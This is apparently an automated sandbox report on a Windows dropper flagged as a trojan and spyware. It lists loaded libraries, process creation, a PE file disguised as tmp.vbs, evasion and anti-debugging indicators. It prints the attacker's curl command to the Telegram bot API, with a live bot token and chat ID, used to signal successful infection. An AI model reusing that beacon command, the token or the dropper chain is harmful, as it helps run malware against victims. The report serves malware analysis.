Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC58D4 4_2_00007FF7B0AC58D4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACB8AC 4_2_00007FF7B0ACB8AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB4840 4_2_00007FF7B0AB4840
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE887C 4_2_00007FF7B0AE887C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD29B8 4_2_00007FF7B0AD29B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AB1AA4 4_2_00007FF7B0AB1AA4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD8A54 4_2_00007FF7B0AD8A54
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE03B4 4_2_00007FF7B0AE03B4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC1A5C 4_2_00007FF7B0AC1A5C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD1B80 4_2_00007FF7B0AD1B80
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF1CE0 4_2_00007FF7B0AF1CE0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACAC34 4_2_00007FF7B0ACAC34
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD1E30 4_2_00007FF7B0AD1E30
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ACEE74 4_2_00007FF7B0ACEE74
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD30E4 4_2_00007FF7B0AD30E4
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD5050 4_2_00007FF7B0AD5050
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327CDC8 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327A384 appears 169 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B329BA1E appears 52 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B322DFF4 appears 35 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327A450 appears 166 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B327CE1C appears 83 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: String function: 00007FF7B329B9FA appears 41 times
Tries to load missing DLLs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.winEXE@14/3@2/3
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ABB6F0 GetLastError,FormatMessageW,LocalFree, 4_2_00007FF7B0ABB6F0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AD8284 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 4_2_00007FF7B0AD8284
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File read: C:\Windows\win.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Virustotal: Detection: 27%
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectory\ (((((
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: tmp.vbs, 00000004.00000000.1510729864.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512748177.00000263F2900000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs, 00000004.00000002.1533810636.00007FF7B0AF8000.00000002.00000001.01000000.00000004.sdmp, tmp.vbs, 00000004.00000003.1512346232.00000263F2009000.00000004.00000020.00020000.00000000.sdmp, tmp.vbs.0.dr
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327CA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 0_2_00007FF7B327CA18
File is packed with WinRar
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_6820156 Jump to behavior
PE file contains sections with non-standard names
Source: tmp.vbs.0.dr Static PE information: section name: .didat
Source: tmp.vbs.0.dr Static PE information: section name: _RDATA
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF4D00 pushfq ; iretd 4_2_00007FF7B0AF4D01
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File created: C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 30000
Source: unknown Network traffic detected: HTTP traffic on port 30000 -> 49707
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe API coverage: 6.3 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A438 FindClose,abort,FindFirstFileExW,GetLastError, 0_2_00007FF7B329A438
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329A4AC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort, 0_2_00007FF7B329A4AC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC40CC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0AC40CC
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AEF900 FindFirstFileExA, 4_2_00007FF7B0AEF900
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE1304 VirtualQuery,GetSystemInfo, 4_2_00007FF7B0AE1304
Source: curl.exe, 00000008.00000003.1533122404.000001FB15815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyy8
Source: SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe, 00000000.00000002.1511313946.0000017017F35000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B329B5B8
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327CA18 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,strlen,malloc,GetSystemDirectoryA,strlen,strcpy,strlen,strcpy,LoadLibraryA,free, 0_2_00007FF7B327CA18
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF0980 GetProcessHeap, 4_2_00007FF7B0AF0980
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B2E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF7B329B2E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B798 SetUnhandledExceptionFilter, 0_2_00007FF7B329B798
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B5B8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7B329B5B8
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2170 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00007FF7B0AE2170
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE7338 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7B0AE7338
